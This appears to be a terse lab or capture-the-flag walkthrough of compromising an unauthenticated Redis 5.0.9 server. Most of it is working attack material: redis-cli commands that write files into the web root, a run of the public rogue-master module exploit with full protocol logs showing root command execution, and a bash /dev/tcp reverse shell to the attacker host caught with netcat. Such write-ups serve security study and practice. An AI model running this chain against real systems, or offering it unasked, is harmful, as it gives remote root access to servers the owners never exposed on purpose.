5 :6379 redis

$ redis-cli -h 192.168.136.69
192.168.136.69:6379> info server

# Server
redis_version:5.0.9
[trunacted]
os:Linux 4.9.0-12-amd64 x86_64
arch_bits:64
tcp_port:6379
executable:/usr/local/bin/redis-server
config_file:/etc/redis/redis.conf

# no keyspaces

# checking dir 
192.168.136.69:6379> config get dir
1) "dir"
2) "/"

192.168.136.69:6379> config set dir /var/www/html/
OK
192.168.136.69:6379> config set dbfilename kashz.txt
OK
192.168.136.69:6379> set test "kashz"
OK
192.168.136.69:6379> save
OK
# can savfe file but server is nginx (not php) and we don't know where is :8080 hosted for nodejs shell

# can't use modules exploit as we don't have a way to push the .so to victim

# trying master-slave exploit
Using https://github.com/vulhub/redis-rogue-getshell

$ python3 redis-master.py -r 192.168.136.69 -p 6379 -L 192.168.49.136 -P 27017 -f RedisModulesSDK/exp.so -c "id"
>> send data: b'*3\r\n$7\r\nSLAVEOF\r\n$14\r\n192.168.49.136\r\n$5\r\n27017\r\n'
>> receive data: b'+OK\r\n'
>> send data: b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$6\r\nexp.so\r\n'
>> receive data: b'+OK\r\n'
>> receive data: b'*1\r\n$4\r\nPING\r\n'
>> receive data: b'*3\r\n$8\r\nREPLCONF\r\n$14\r\nlistening-port\r\n$4\r\n6379\r\n'
>> receive data: b'*5\r\n$8\r\nREPLCONF\r\n$4\r\ncapa\r\n$3\r\neof\r\n$4\r\ncapa\r\n$6\r\npsync2\r\n'
>> receive data: b'*3\r\n$5\r\nPSYNC\r\n$40\r\n3910caee278bcb57907d94b211bca5adc637c53e\r\n$1\r\n1\r\n'
>> send data: b'*3\r\n$6\r\nMODULE\r\n$4\r\nLOAD\r\n$8\r\n./exp.so\r\n'
>> receive data: b'-ERR Error loading the extension. Please check the server logs.\r\n'
>> send data: b'*3\r\n$7\r\nSLAVEOF\r\n$2\r\nNO\r\n$3\r\nONE\r\n'
>> receive data: b'+OK\r\n'
>> send data: b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$8\r\ndump.rdb\r\n'
>> receive data: b'+OK\r\n'
>> send data: b'*2\r\n$11\r\nsystem.exec\r\n$2\r\nid\r\n'
>> receive data: b'$40\r\nquid=0(root) gid=0(root) groups=0(root)\n\r\n'
quid=0(root) gid=0(root) groups=0(root)

>> send data: b'*3\r\n$6\r\nMODULE\r\n$6\r\nUNLOAD\r\n$6\r\nsystem\r\n'
>> receive data: b'+OK\r\n'

# rev shell
# tried a bunch finally this worked
$ python3 redis-master.py -r 192.168.136.69 -p 6379 -L 192.168.49.136 -P 27017 -f RedisModulesSDK/exp.so -c "bash -c 'bash -i >& /dev/tcp/192.168.49.136/6379 0>&1'"
>> send data: b'*3\r\n$7\r\nSLAVEOF\r\n$14\r\n192.168.49.136\r\n$5\r\n27017\r\n'
>> receive data: b'+OK\r\n'
>> send data: b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$6\r\nexp.so\r\n'
>> receive data: b'+OK\r\n'
>> receive data: b'*1\r\n$4\r\nPING\r\n'
>> receive data: b'*3\r\n$8\r\nREPLCONF\r\n$14\r\nlistening-port\r\n$4\r\n6379\r\n'
>> receive data: b'*5\r\n$8\r\nREPLCONF\r\n$4\r\ncapa\r\n$3\r\neof\r\n$4\r\ncapa\r\n$6\r\npsync2\r\n'
>> receive data: b'*3\r\n$5\r\nPSYNC\r\n$40\r\n53c88bb260c5a95b8f9ecc4701a957edb7236d44\r\n$1\r\n1\r\n'
>> send data: b'*3\r\n$6\r\nMODULE\r\n$4\r\nLOAD\r\n$8\r\n./exp.so\r\n'
>> receive data: b'+OK\r\n'
>> send data: b'*3\r\n$7\r\nSLAVEOF\r\n$2\r\nNO\r\n$3\r\nONE\r\n'
>> receive data: b'+OK\r\n'
>> send data: b'*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$8\r\ndump.rdb\r\n'
>> receive data: b'+OK\r\n'
>> send data: b"*2\r\n$11\r\nsystem.exec\r\n$54\r\nbash -c 'bash -i >& /dev/tcp/192.168.49.136/6379 0>&1'\r\n"

$ nc -lvnp 6379
listening on [any] 6379 ...
connect to [192.168.49.136] from (UNKNOWN) [192.168.136.69] 57340
bash: cannot set terminal process group (572): Inappropriate ioctl for device
bash: no job control in this shell
root@wombo:/# whoami;id;hostname
whoami;id;hostname
root
uid=0(root) gid=0(root) groups=0(root)
wombo

Last updated